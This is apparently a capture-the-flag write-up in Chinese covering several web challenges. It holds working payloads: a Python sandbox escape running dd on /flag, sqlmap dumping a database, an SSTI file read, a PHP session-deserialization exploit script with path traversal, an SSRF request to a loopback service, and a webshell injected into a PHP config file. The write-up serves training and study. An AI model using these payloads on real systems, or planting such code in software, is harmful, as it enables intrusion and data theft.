强网杯wp

本文最后更新于:2024年12月14日 下午

PyBlockly


脚本爆破特殊字符绕过,__import__可以导入模块。覆盖python内置函数len,使其恒返回1

import unidecode

# Enumerate the code points in [0, 10000) whose unidecode() transliteration
# collapses to '='. The page uses the result to find look-alike characters
# that slip past a character filter; the defensive takeaway is that input
# must be validated after normalisation, never before it.
candidates = range(0, 10000)

lookalikes = [chr(cp) for cp in candidates if unidecode.unidecode(chr(cp)) == '=']
for ch in lookalikes:
    print(repr(ch))

flag权限不够,可以用dd提权

# Reads /flag via dd, which on this box runs with more privilege than the
# caller (see the sentence above). Any sudo/setuid grant on dd is an
# arbitrary-file-read primitive and should not be handed out.
dd if=/flag
‘)፤__builtins__。len ⇐ lambda x፥ 1◳
‘+str(__import__(‘os’)᙮system(‘dd if⇔↗flag’))+’

最终payload

snake

import requests
from collections import deque

# Game parameters: board size and the four moves as (dx, dy) deltas.
# 'UP' is (0, -1), i.e. y grows downward.
GRID_WIDTH = 20
GRID_HEIGHT = 20
# NOTE(review): DIRECTIONS is not referenced anywhere below; MOVES is used instead.
DIRECTIONS = ['UP', 'DOWN', 'LEFT', 'RIGHT']
MOVES = {
'UP': (0, -1),
'DOWN': (0, 1),
'LEFT': (-1, 0),
'RIGHT': (1, 0)
}

# Initialise one HTTP session reused for every request.
session = requests.Session()

# Challenge instance. It already ends with '/', so the '+ '/move'' and
# '+ '/'' joins below produce a double slash in the resulting URLs.
base_url = 'http://eci-2zeg4gjm1ccotm7csi62.cloudeci1.ichunqiu.com:5000/'

headers = {
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': 'Mozilla/5.0',
'Content-Type': 'application/json',
'Accept': '*/*',
'Origin': base_url,
'Referer': base_url + '/',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
}

# Pre-obtained session cookie; every request below is made as this identity.
# NOTE(review): looks like a Flask-style signed session (base64 JSON, timestamp,
# signature) — confirm against the challenge source.
cookies = {
'session': 'eyJ1c2VybmFtZSI6Int7MSAxfX0ifQ.ZyZPqA.r1I5UHgWZtPRZBpdaxzAJE9-Vg4'
}

def send_move(direction):
    """Post one move to the game server and return its decoded JSON reply.

    Args:
        direction: one of the MOVES keys ('UP', 'DOWN', 'LEFT', 'RIGHT').

    Returns:
        The parsed JSON body on HTTP 200, otherwise None (the status code
        is printed). Uses the module-level session, base_url, headers and
        cookies.
    """
    payload = {"direction": direction}
    # base_url already ends with '/', so this request goes to '//move';
    # the server evidently accepts it.
    reply = session.post(base_url + '/move', headers=headers, cookies=cookies, json=payload)
    if reply.status_code != 200:
        print("Error:", reply.status_code)
        return None
    # Echo the raw body before decoding so a malformed reply is still visible.
    print("服务器返回的JSON:", reply.text)
    return reply.json()

def bfs(snake, food, grid_width, grid_height):
    """Breadth-first search from the snake's head to ``food``.

    Args:
        snake: list of [x, y] cells, head first.
        food: the [x, y] target cell.
        grid_width, grid_height: board bounds; cells outside are never visited.

    Returns:
        A list of MOVES keys describing a shortest path, or None if the
        food is unreachable. Every cell occupied by the snake (tail included)
        is treated as blocked.
    """
    start = tuple(snake[0])
    target = tuple(food)
    blocked = {tuple(segment) for segment in snake}
    frontier = deque([(start, [])])
    seen = {start}
    while frontier:
        pos, route = frontier.popleft()
        if pos == target:
            return route
        x, y = pos
        for name, (dx, dy) in MOVES.items():
            nxt = (x + dx, y + dy)
            inside = 0 <= nxt[0] < grid_width and 0 <= nxt[1] < grid_height
            if not inside or nxt in blocked or nxt in seen:
                continue
            seen.add(nxt)
            frontier.append((nxt, route + [name]))
    return None  # food unreachable

def get_next_positions(snake, grid_width, grid_height):
    """Map each MOVES direction to the head cell it would reach.

    Only moves that stay inside the grid and do not land on a cell in
    ``snake`` are kept. The returned dict preserves MOVES iteration order.
    """
    hx, hy = snake[0]
    options = {}
    for name, (dx, dy) in MOVES.items():
        cell = [hx + dx, hy + dy]
        inside = 0 <= cell[0] < grid_width and 0 <= cell[1] < grid_height
        # Membership is a list-vs-list comparison, so snake must hold lists.
        if inside and cell not in snake:
            options[name] = cell
    return options

# Start the game with an arbitrary first move and read the initial state.
state = send_move('RIGHT')
if not state:
    print("无法开始游戏。")
    exit()

food = state['food']
snake = state['snake']

print("开始游戏。")

while True:
    route = bfs(snake, food, GRID_WIDTH, GRID_HEIGHT)
    if route:
        next_move = route[0]
    else:
        # No path to the food: fall back to the first safe neighbouring cell.
        safe = get_next_positions(snake, GRID_WIDTH, GRID_HEIGHT)
        if not safe:
            print("没有可移动的位置,游戏结束。")
            break
        next_move = next(iter(safe))
    state = send_move(next_move)
    if not state:
        print("无法从服务器获取游戏状态。")
        break
    if state.get('status') != 'ok':
        print("游戏结束:", state)
        break
    food = state['food']
    snake = state['snake']
    print("移动方向:", next_move, "当前得分:", state['score'])

用ai写了自动玩游戏脚本

发现路由snake_win?username=test

单引号报错,可以sql注入

# Automated injection test against the `username` parameter of /snake_win,
# the one that returned an error on a single quote above. --batch answers
# every prompt with its default; -D sqlite --dump-all dumps the whole database.
sqlmap -u "http://test.com/snake_win?username=4" --level 3 --batch -D sqlite --dump-all

测试发现在/set_username路由打ssti,可以在数据库里回显

e7a87c52c28923fe3705c4effbe694dc

{{().__class__.__bases__[0].__subclasses__()[79]["get_data"](0, "/flag")}}

platform

session反序列化

a34359bdb655f547f26407974947caaf

这里有目录穿越

利用 public function filterSensitiveFunctions() 可以打长度扩展攻击:前面的 username 被黑名单过滤掉之后,后面就多出额外的长度,用来放我们的序列化数据。

但是要一个满足我们长度要求的sessionid,写个脚本循环提交,直到正好满足我们的长度要求。system被过滤了,拼接一下就好了。

import requests
import random
import string


# Challenge instance the requests below are sent to.
url="http://eci-2ze8q3dnoj0sy32l7ism.cloudeci1.ichunqiu.com/"
# "system" is blacklisted (see the text above), so the name is split into two
# literals and concatenated at runtime. len(cmd) is 31, which is the s:31
# length declared for "data" in the serialized payload below.
cmd = "$a='sys'.'tem';$a('/readflag');"
# NOTE(review): the loop never breaks; presumably it is stopped by hand once
# the dashboard output shows the expected result.
while True:
    # Fresh 10-character session id per attempt: the text above says the stored
    # session must land at an exact length, so attempts are simply repeated.
    rand_session = ""
    # Filler username. Per the text above, the blacklist in
    # filterSensitiveFunctions() strips/rewrites it, which is what frees up the
    # room for the serialized object — confirm against the filter's source.
    username="popen"*14
    for i in range(10):
        rand_session += random.choice("qwertyuiopasdfghjklzxcvbnm1234567890")
    # Posted twice on purpose: a single request did not reliably land in the
    # session file (see the note after this listing).
    res=requests.post(url+"index.php",cookies={"PHPSESSID":rand_session},data={"username":username,"password":'test";test|O:15:"notouchitsclass":1:{s:4:"data";s:31:"cmd";}'.replace('cmd',cmd)},allow_redirects=False)
    res=requests.post(url+"index.php",cookies={"PHPSESSID":rand_session},data={"username":username,"password":'test";test|O:15:"notouchitsclass":1:{s:4:"data";s:31:"cmd";}'.replace('cmd',cmd)},allow_redirects=False)
    print(rand_session)
    print(username)
    print(res.text)
    # Session id prefixed with '../' + 'sess_': this is the directory traversal
    # mentioned above, carried in the PHPSESSID cookie. A session handler should
    # reject ids containing path separators, and a cookie value like this is the
    # thing to alert on in access logs.
    res=requests.post(url+"index.php",cookies={"PHPSESSID":'../'+"sess_"+rand_session},data={},allow_redirects=False)
    print(res.text)
    # Load the dashboard under the normal id; presumably to observe the effect.
    res=requests.get(url+"dashboard.php",cookies={"PHPSESSID":rand_session},allow_redirects=False)
    print(res.text)

这里发了两次覆盖请求,是因为测试发现一次似乎覆盖不进session。猜测可能第一次没创建文件?

proxy

构造个接口就行了

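# POSTs a JSON body to the proxy endpoint. The original listing closed the
# "url" value with a curly ” (a copy/paste artefact), which makes the JSON
# invalid; it is a plain " here. The endpoint forwards caller-supplied URLs to
# a loopback service, which is the defect being shown — an allow-list of
# proxied hosts is the usual fix.
curl -X POST http://39.106.54.211:22553/v2/api/proxy \
-H 'Content-Type: application/json' \
-d '{
"url": "http://127.0.0.1:8769/v1/api/flag",
"method": "GET",
"follow_redirects": true
}'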

xiaohuanxiong

1
https://github.com/Empty2081/raccoon5

github有源代码

测试发现 /admin/books 和 /admin/admins 都可以未授权访问

直接添加新管理员

登陆后在订单管理里可以向config/payments.php写文件

<?php
// The two statements before `return` are the part written in through the
// order-management page (see the text above); a payments config should
// consist solely of the returned array. Any executable statement ahead of it
// in config/payments.php means the file was tampered with: close that write
// path and diff the file against the shipped version.
phpinfo();
echo system("cat /flag");
// --- original configuration array from here on ---
return [
'default' => [ // default: no payment mode
'channel' => [
]
],
'pay' => [ // Huanxi pay; site: https://www.zhapay.com/
'appid' => '',
'appkey' => '',
'channel' => [
['type' => 2, 'code' => 1, 'img' => 'alipay', 'title' => '支付宝'],
['type' => 1, 'code' => 3, 'img' => 'weixin', 'title' => '微信支付']
]
],
'kami' => [
'url' => '' // card-key (kami) URL
],
'vip' => [ // VIP durations (months) and their prices
['month' => 1, 'price' => 5],
['month' => 6, 'price' => 100],
['month' => 12, 'price' => 400]
],
'money' => [1, 5, 10, 30, 50], // selectable top-up amounts
'promotional_rewards_rate' => 0.1, // referral commission rate on top-ups; must be a decimal fraction
'reg_rewards' => 1, // sign-up reward, in yuan
'mobile_bind_rewards' => 0 // phone-binding reward, in yuan
];
